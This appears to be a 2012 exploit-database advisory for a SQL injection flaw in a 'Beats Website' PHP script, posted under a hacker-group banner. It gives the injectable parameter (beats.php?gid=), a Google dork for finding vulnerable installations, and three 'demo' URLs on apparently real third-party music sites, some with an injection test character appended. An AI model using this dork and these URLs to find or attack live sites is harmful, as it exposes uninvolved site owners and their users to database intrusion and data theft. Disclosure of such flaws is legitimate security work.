Beats Website SQL Injection Vulnerability

EKU-ID: 1515	CVE:	OSVDB-ID:
Author: system k1ller	Published: 2012-02-23	Verified:
Download:

Rating

☆☆☆☆☆

________      _____________________ 
\______ \    /  |  \__    ___/  |  |
 |    |  \  /   |  |_|    | /   |  |_
 |    `   \/    ^   /|    |/    ^   /
/_______  /\____   | |____|\____   |
        \/      |__|            |__|
  ___ ___    _____        _______               
 /   |   \  /  |  |___  __\   _  \_______  ______
/    ~    \/   |  |\  \/  /  /_\  \_  __ \/  ___/
\    Y    /    ^   />    <\  \_/   \  | \/\___ \
 \___|_  /\____   |/__/\_ \\_____  /__|  /____  >
       \/      |__|      \/      \/           \/



# Exploit Title:  Beats Website SQLi
# Date: 20/02/2012
# Author: system k1ller   
# Vendor or Software Link: http://beatwebs.com/
# Category:: webapp
# Google dork: Powered by: Beat Websites or inurl:beats.php?gid=
# Tested on: Backtrack 5
#Gr33tz : Wino ,  L0ckreaderz , ProteriaN , Porspeous , EraGoN , mast3r , system K1LL3r
vishmk , Bl4ze

Expolit :


http://www.site.com/[path]/beats.php?gid=[SQLi]
http://www.site.com/beats.php?gid=[SQLi]


#demo :
http://www.thesickbeats.com/beats.php?gid=20%27
http://www.dgpbeats.com/beats.php?gid=20
http://www.heirbornmusic.net/beats.php?gid=4%27

Copyright(C) D4T4 H4x0rs